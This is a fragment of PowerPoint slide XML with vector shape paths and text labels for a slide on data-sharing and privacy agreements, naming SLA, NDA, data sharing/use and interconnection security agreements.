              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2710179" h="2710179">
                  <a:moveTo>
                    <a:pt x="380936" y="2498179"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="371779" y="2457031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353453" y="2418334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325983" y="2383688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291299" y="2356218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252590" y="2337892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211442" y="2328735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169494" y="2328735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128346" y="2337892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89636" y="2356218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54965" y="2383688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27482" y="2418334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9156" y="2457031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2498179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2540139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9156" y="2581300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27482" y="2620035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54965" y="2654706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89636" y="2682189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128346" y="2700515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169494" y="2709672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211442" y="2709672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252590" y="2700515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291299" y="2682189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325983" y="2654706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353453" y="2620035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371779" y="2581300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380936" y="2540139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380936" y="2498179"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2710179" h="2710179">
                  <a:moveTo>
                    <a:pt x="2709672" y="2498179"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2700540" y="2457031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2682290" y="2418334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654909" y="2383688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2620391" y="2356218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2581808" y="2337892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540812" y="2328735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498991" y="2328735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457996" y="2337892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2419413" y="2356218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2384907" y="2383688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357513" y="2418334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2339263" y="2457031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330132" y="2498179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330132" y="2540139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2339263" y="2581300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357513" y="2620035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2384907" y="2654706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2419413" y="2682189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457996" y="2700515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498991" y="2709672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540812" y="2709672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2581808" y="2700515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2620391" y="2682189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654909" y="2654706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2682290" y="2620035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2700540" y="2581300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709672" y="2540139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709672" y="2498179"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2710179" h="2710179">
                  <a:moveTo>
                    <a:pt x="2709672" y="168859"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2700540" y="127863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2682290" y="89281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654909" y="54762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2620391" y="27381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2581808" y="9131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540812" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498991" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457996" y="9131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2419413" y="27381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2384907" y="54762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357513" y="89281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2339263" y="127863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330132" y="168859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330132" y="210680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2339263" y="251675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357513" y="290258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2384907" y="324764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2419413" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457996" y="370408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498991" y="379539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540812" y="379539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2581808" y="370408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2620391" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654909" y="324764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2682290" y="290258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2700540" y="251675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709672" y="210680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709672" y="168859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498591" y="3400044"/>
              <a:ext cx="1256665" cy="577850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1256665" h="577850">
                  <a:moveTo>
                    <a:pt x="691388" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681101" y="30606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095883" y="443864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085336" y="472078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084373" y="501268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093007" y="528554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="551052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138388" y="571126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170813" y="577818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204190" y="571126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234186" y="551052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1251394" y="521090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256601" y="487283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249330" y="453451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229106" y="423417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202779" y="406201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172130" y="400462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140505" y="406201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="423417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691388" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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541264" y="3351275"/>
              <a:ext cx="5198745" cy="4006850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5198745" h="4006850">
                  <a:moveTo>
                    <a:pt x="1256601" y="3518090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1251394" y="3484207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1234186" y="3454146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204188" y="3434003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170813" y="3427285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138377" y="3434003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="3454146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093000" y="3476675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084364" y="3504019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085329" y="3533292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095883" y="3561588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681101" y="3975862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3975862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4006596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691388" y="4006596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111250" y="3582035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140498" y="3599332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172121" y="3605085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202778" y="3599332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229106" y="3582035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249324" y="3551986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256601" y="3518090"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5198745" h="4006850">
                  <a:moveTo>
                    <a:pt x="5198364" y="3853942"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4517263" y="3853942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102481" y="3439668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113022" y="3411372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113987" y="3382099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105351" y="3354755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="3332226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059974" y="3312083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4027538" y="3305365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994162" y="3312083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964178" y="3332226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946969" y="3362287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3941762" y="3396170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949027" y="3430066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969258" y="3460115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995572" y="3477412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026230" y="3483165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057853" y="3477412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="3460115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4506976" y="3884676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="3884676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="3853942"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5198745" h="4006850">
                  <a:moveTo>
                    <a:pt x="5198364" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4506976" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057853" y="407276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4026230" y="401510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3995572" y="407276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969258" y="424561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3949027" y="454621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3941762" y="488505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3946969" y="522401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964178" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994162" y="572604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4027538" y="579310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4059974" y="572604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4087114" y="552450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105351" y="529932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113987" y="502589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4113022" y="473316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4102481" y="445008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517263" y="30734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="30734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198364" y="0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3262376" y="3051666"/>
            <a:ext cx="2181860" cy="79184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75"/>
              </a:spcBef>
            </a:pP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Service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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Level</a:t>
            </a:r>
            <a:endParaRPr sz="2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Agre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emen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(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LA)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784205" y="2960903"/>
            <a:ext cx="2297430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39700">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Non-Disclosure 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Agre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emen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(N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A)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720196" y="6772530"/>
            <a:ext cx="2271395" cy="79057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dirty="0" sz="2200" spc="-14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Sharing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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="131445">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pP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Use</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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Agreement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72103" y="6724294"/>
            <a:ext cx="2114550" cy="1173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1905">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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Interconnection </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Security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Agre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emen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(I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A)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60919" y="4511040"/>
            <a:ext cx="1563624" cy="1565148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39615" y="306451"/>
            <a:ext cx="817435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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terms</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agreement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9276" y="760476"/>
            <a:ext cx="11160251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847469" y="1439036"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="1439036"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="1917953"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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869186" y="1448561"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="5901944" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5901944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869186" y="1448561"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="78231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5901944" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0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052320" y="2294584"/>
            <a:ext cx="783082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Need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acces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contr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ls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ris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k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as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ess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m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en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prot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ec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73579" y="1464563"/>
            <a:ext cx="5875020" cy="429895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="39405A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="31115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245"/>
              </a:spcBef>
            </a:pP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Service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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Level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Agreement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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(SLA)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847469" y="3194685"/>
            <a:ext cx="12563475" cy="1567815"/>
            <a:chOff x="1847469" y="3194685"/>
            <a:chExt cx="12563475" cy="1567815"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1856994" y="3673602"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88645" y="1078992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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869186" y="3204210"/>
              <a:ext cx="5980430" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5980430" h="469900">
                  <a:moveTo>
                    <a:pt x="5901944" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47791" y="6151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22923" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980175" y="78231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5974024" y="47791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5957252" y="22923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932384" y="6151"/>
                  </a:lnTo>
